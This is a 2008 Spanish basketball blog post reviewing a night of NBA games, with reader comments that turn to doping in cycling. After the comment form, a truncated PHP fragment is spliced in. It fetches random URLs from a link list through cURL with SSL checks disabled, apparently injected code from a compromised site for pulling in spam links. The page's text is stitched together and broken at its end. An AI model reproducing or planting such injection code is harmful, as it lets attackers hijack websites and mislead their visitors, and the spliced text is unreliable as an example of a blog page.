La Crónica (19/11/2008)

20 de November de 2008 por TheDeerHunter

Volvió a caer Cleveland, tras más de dos semanas sin hacerlo. Fueron los “romperrachas” de Detroit quien lograron la machada, esta vez en el Auburn, imponiéndose gracias a un punto más de eficacia anotadora y también a un pelín más de pegada interior, uno de los defectos de los de pueden adolecer los Cavs. Lebron hizo números “normalitos” para él (25ptos, 6rebs, 6asis, 4rob). Es increíble.

Quien sí mantienen su racha son los “reformados” Nuggets a los que le fue suficiente con parar a Duncan (y ya es) para llevarse el gato al agua. En otro partido con ausencias ilustres los Mavericks sin Howard ganaron a los Houston sin Yao… y casi sin el resto de sus estrellas.

La de anoche fue una auténtica revelión de los modestos. John Salmons lideró a los Kings en su victoria contra Hornets, Craig Smith fue clave en la victoria de los Wolves contra Philadelphia… incluso los Clippers lograron romper su racha de derrotas, eso sí, contra los Thunder que demostraron que todavía son bastante más paquetes que ellos. Y los Wizards no ganaron a los Hawks por el canto de un duro.

Con respecto a los españoles, volvió Calderón y, sin hacer nada del otro jueves logró la jugada decisiva para ganar un complicadísimo partido contra los Heat de un Wade sideral. Los Blazers barrieron a los Bulls con muchos minutos de Sergio y del resto de los suplentes de última fila. Rudy apenas jugó, lo tomaremos como algo puntual y anecdótico.

Por último, Utah no tuvo que especiales problemas para doblegar a Milwaukee.

Conclusiones

– Se habla mucho de la jugada “a futuro” de Detroit y no seré yo quien aplauda la pérdida de Billups bajo ninguna circunstancia, pero hay que reconocer que han logrado un punto de “peligrosidad imprevisible” que antes no tenían. No han mejorado su solvencia como equipo pero sí les veo más en disposición de dar sustos gordos en playoffs.

– Denver lleva 5 partidos con una media de 93 puntos encajados. ¿quién les ha visto y quién les ve?

– En Houston ya no ganan para sustos. Se hablaba de los problemas físicos de T-Mac y Artest (que los tienen) y va y el que se pierde el partido por lesión es Yao. Qué malísima pinta tiene este asunto para ellos.

Premios

MVP: Grandes actuaciones en equipos perdedores. Wade, Lebrón, Butler… Quien se salió y ganó fue John Salmons, con todo el mérito que, en su caso, hay que tener en cuenta.

El Rookie: Fue una noche un tanto regulera para los novatos. Nos quedamos con el buen debut de Oden en casa y su buena línea de los últimos partidos.

La sorpresa: Partidazo de Bargnani jugando de 3. Se le está viendo más agresivo… os lo juro.

La decepción: Hubo algunas… sobre todo de algún que otro rookie ilustre, que no tuvo su noche. Nos quedamos, sin embargo, con la actuación de Stojakovic impropia de él mismo.

El mayor esfuerzo en vano: El partidazo de Wade fue en términos objetivos la mejor actuación individual de la noche. 40ptos, 11 rebs, 5 taps… ainssss

Y si queréis ver las mejores jugadas de la jornada:

Comenta

10 comentarios a esta entrada

  1. Kantonyo dice:
    #1

    Parece ser que el cambio de Billups-Iverson, ha despertado el juego de unos, y ha consolidado el de otros.

    Era muy precipitado enterrar a una plantilla como Detroit, que lleva unos años jugando a buen nivel. Lo perfecto sería que Iverson se limitara a jugar más en equipo, a ver si el novato Michael Curry tiene bemoles para imponerse y hacer que Allen reparta juego y se mueva por la pista como solo él sabe hacerlo, para abrir hueco a sus compañeros. En el partido de ayer Wallace decidió el partido con sus dos triples consecutivos y sus rebotes decisivos en el último cuarto.

    Como bien dices Deer, Detroit ‘puede’ que sea peor equipo que el año pasado, pero su clasificación para los play-offs esta practicamente asegurada, y con Iverson, tendrán más posibilidades de dar la campanada.

      Citar

  2. Fran Reyes dice:
    #2

    Dije en un comentario del blog de un amigo (http://notodoesfutbol.blogspot.com) lo siguiente:

    “Un equipo sobrado de magia y corto de solidez como Nuggets y otro sobrado de solidez y falto de magia como Pistons se intercambian sus excesos para paliar sus carencias”

    El tiempo, por una vez, me da la razón 😀

      Citar

  3. TheDeerHunter dice:
    #3

    Fantástico apunte, Fran… la lástima en tu caso es que para que quede redondo del todo debemos esperar a que Detroit vuelva a llegar, al menos a la final de conferencia y, quizás ganarla… y al mismo tiempo Denver llegue a primera ronda como mínimo.

    A pesar de todo, sigo sin apostar por ambas premisas al mismo tiempo.

      Citar

  4. Txusma dice:
    #4

    Caramba Fran! Q poesia! Cuando quieras te dejamos q escribas algun articulo por aqui. Eso si, tan bonito como la frase. 😀

      Citar

  5. Fran Reyes dice:
    #5

    @ Txusma

    Te tomo la palabra. Trabajo en una web de ciclismo y aparte gestiono un blog propio, pero espero sacar tiempo y prepararos algo 🙂

      Citar

  6. Txusma dice:
    #6

    Ya he visitado el blog de ciclismo y se ve muy interesante. Yo sigo otro digamos un poco mas apocaliptico, seguro q lo conoces si estas en el mundillo.

      Citar

  7. Fran Reyes dice:
    #7

    No me digas más: Ciclismo2005

      Citar

  8. Txusma dice:
    #8

    Bingo!! Y ahora tu opinion: Exagera? Es todo verdad o al menos media verdad? Dejo de creer en el ciclismo? Renuevo la ilusion un Tour más?

      Citar

  9. Fran Reyes dice:
    #9

    Es algo muy complicado. Yo solía leer ese blog, pero siempre se ha dicho que “vende tangas a tanguistas” (cuenta a la gente que cree en un dopaje absoluto y generalizado que existe el dopaje absoluto y generalizado) y la verdad es que ya me cansé un poco de que llevara siempre la misma cantinela.

    El dopaje existe. El cero dopaje también existe. El dopaje absoluto existe. ¿Cuál existe más? El dopaje, el uso de recuperantes e intentar mantener la tasa de hematocrito cerca de 50% pero sin rebasarlo. Los tiempos del dopaje absoluto ya pasaron, mientras que los del cero dopaje estan por llegar (aunque algunos ciclistas lo practican, o se ven obligados a practicarlo por ciertas manos negras).

    Sin embargo, es un asunto muy complejo cuya explicación acarreraría problemas. Porque el dopaje es una red circular donde, simplificando, los mismos que suministran sustancias dopantes organizan los controles antidopaje, y los mismos que fabrican la sustancia fabrican también su método de detección. Una cadena donde el único que puede salir perdiendo es el ciclista.

      Citar

  10. Kantonyo dice:
    #10

    Vaya esto del doping me recuerda entonces a las compañias de AntiVirus, si no existiera virus, ellos no tendrian negocio…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>